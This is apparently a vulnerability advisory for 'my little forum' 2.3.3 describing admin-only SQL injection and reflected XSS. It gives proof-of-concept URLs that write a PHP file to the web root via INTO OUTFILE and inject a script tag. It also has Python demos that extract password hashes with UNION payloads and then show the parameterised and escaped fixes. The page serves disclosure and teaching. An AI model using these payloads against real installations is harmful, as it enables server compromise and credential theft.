CVSS2 base score: 6.5 (Medium)
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

EPSS score: 0.016 (Low)
EPSS percentile: 85.7%
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in my little forum which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks. The SQL injection vulnerabilities are rated medium risk because they are exploitable only from an administrator account, or against an administrator via a cross-site request forgery (XSRF) vector.
1.1 Input passed via the "edit_category" HTTP GET parameter to the "/index.php" script is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The simple PoC below creates a file in the web root containing a call to phpinfo(). It works only if the MySQL account has the FILE privilege, the MySQL server process (not the web server user) can write to the target directory, and secure_file_priv does not restrict the location. Note that the payload ends with "-- " (two dashes followed by a space), which is the comment form MySQL requires:
http://[host]/index.php?mode=admin&edit_category=' UNION SELECT 1,2,3,'<? phpinfo() ?>' INTO OUTFILE '/var/www/file.php' -- 
1.2 Input passed via the "letter" HTTP GET parameter to the "/index.php" script is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The simple PoC below creates a file in the web root containing a call to phpinfo(), under the same MySQL privilege and directory-permission conditions as in 1.1. The query selects a single column, so the UNION needs only one value:
http://[host]/index.php?mode=admin&action=user&letter=' UNION SELECT '<? phpinfo() ?>' INTO OUTFILE '/var/www/file.php' -- 
Both vulnerabilities require administrative privileges; however, they can also be exploited via an XSRF vector, since the application is also vulnerable to cross-site request forgery, by luring a logged-in administrator to a page that issues the crafted GET request.
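The following Python script is an added illustration of the injection pattern behind 1.1 and 1.2; it is not code from the advisory or from my little forum. It rebuilds the two vulnerable query shapes (an assumption: the real table and column names are not given on this page) in an in-memory SQLite database, runs the same quote-break / UNION / comment payload shape against them, and shows the parameterised form that neutralises it. SQLite has no INTO OUTFILE, so the payloads pull rows from another table instead of writing a file; the column-count difference between the two PoCs (four values versus one) is preserved.

```python
import sqlite3


# Constructed schema standing in for the forum's own tables (assumption: the
# advisory does not show the real layout; names here are illustrative).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE categories (id INTEGER, title TEXT, description TEXT, position INTEGER)"
    )
    con.executemany(
        "INSERT INTO categories VALUES (?, ?, ?, ?)",
        [(1, "General", "General discussion", 1), (2, "Staff", "Moderators only", 2)],
    )
    con.execute("CREATE TABLE users (id INTEGER, user_name TEXT, pw_hash TEXT, email TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            (1, "admin", "hash-of-admin-pw", "admin@example.org"),
            (2, "alice", "hash-of-alice-pw", "alice@example.org"),
        ],
    )
    return con


# 1.1: edit_category spliced into the query text. Four selected columns are
# why the advisory's payload needs "UNION SELECT 1,2,3,'...'".
def load_category_vulnerable(con: sqlite3.Connection, edit_category: str):
    sql = (
        "SELECT id, title, description, position FROM categories "
        "WHERE id = '" + edit_category + "'"
    )
    return con.execute(sql).fetchall()


# 1.2: letter spliced into a LIKE pattern; one column selected, so a
# single-column UNION suffices (as in the advisory's second payload).
def list_users_vulnerable(con: sqlite3.Connection, letter: str):
    sql = "SELECT user_name FROM users WHERE user_name LIKE '" + letter + "%'"
    return con.execute(sql).fetchall()


# Hardened forms: the parameter is bound, never concatenated into SQL text.
def load_category_fixed(con: sqlite3.Connection, edit_category: str):
    return con.execute(
        "SELECT id, title, description, position FROM categories WHERE id = ?",
        (edit_category,),
    ).fetchall()


def list_users_fixed(con: sqlite3.Connection, letter: str):
    return con.execute(
        "SELECT user_name FROM users WHERE user_name LIKE ?", (letter + "%",)
    ).fetchall()


# Same shape as the advisory's payloads: close the quote, UNION in attacker-
# chosen columns, comment out the rest. Trailing space after "--" is what
# MySQL requires; SQLite accepts it too.
CATEGORY_PAYLOAD = "' UNION SELECT id, user_name, pw_hash, email FROM users -- "
LETTER_PAYLOAD = "' UNION SELECT pw_hash FROM users -- "


def demo() -> dict:
    con = make_db()
    return {
        "category_vulnerable": load_category_vulnerable(con, CATEGORY_PAYLOAD),
        "category_fixed": load_category_fixed(con, CATEGORY_PAYLOAD),
        "letter_vulnerable": list_users_vulnerable(con, LETTER_PAYLOAD),
        "letter_fixed": list_users_fixed(con, LETTER_PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable functions return the users table's password hashes in place of category or user-name rows; the bound-parameter versions return nothing for the same input because the whole string is compared as a value. On the MySQL side, the INTO OUTFILE variant additionally depends on the FILE privilege, a directory writable by mysqld and a permissive secure_file_priv, which is why revoking FILE from the web application's database account is a worthwhile hardening step even after the queries are fixed.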
2.1 Input passed via the "back" HTTP GET parameter to "/index.php" is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
The PoC below uses the JS alert() function to display a pop-up reading "ImmuniWeb":
http://[host]/index.php?delete_posting=1&mode=posting&back=%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E
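The following Python script is an added example, not code from the advisory or from my little forum. It decodes the PoC URL above (with the constructed host forum.example substituted for [host]) the way PHP's $_GET would, then renders the value into a hidden form field twice: unescaped, as the vulnerable page does, and through html.escape, the equivalent of PHP's htmlspecialchars($back, ENT_QUOTES). The hidden-field context is an assumption; the payload's leading %22%3E ('">') is the part that closes such an attribute before the script tag begins.

```python
import html
from urllib.parse import unquote_plus, urlsplit

# The advisory's PoC URL with "forum.example" in place of "[host]" (constructed).
POC_URL = (
    "http://forum.example/index.php?delete_posting=1&mode=posting"
    "&back=%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E"
)


def query_params(url: str) -> dict:
    """Decode the query string like PHP's $_GET (split on '&', percent-decode)."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def render_back_vulnerable(back: str) -> str:
    # Assumed vulnerable template: the raw value lands inside a quoted attribute.
    return '<input type="hidden" name="back" value="' + back + '">'


def render_back_fixed(back: str) -> str:
    # html.escape(quote=True) encodes & < > " ' so the value cannot break out
    # of the attribute or open a tag.
    return (
        '<input type="hidden" name="back" value="'
        + html.escape(back, quote=True)
        + '">'
    )


def contains_script_tag(markup: str) -> bool:
    return "<script>" in markup.lower()


if __name__ == "__main__":
    back = query_params(POC_URL)["back"]
    print("decoded back =", back)
    print(render_back_vulnerable(back))
    print(render_back_fixed(back))
```

The unescaped rendering yields a closed attribute followed by a live script element; the escaped rendering keeps the entire payload inside the attribute value as text. Because the advisory notes the page is also reachable via a delete_posting action, the same link doubles as the XSRF trigger for the SQL injection issues above when the victim is an administrator.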
| CPE | Name | Operator | Version |
|---|---|---|---|
| | my little forum | le | 2.3.3 |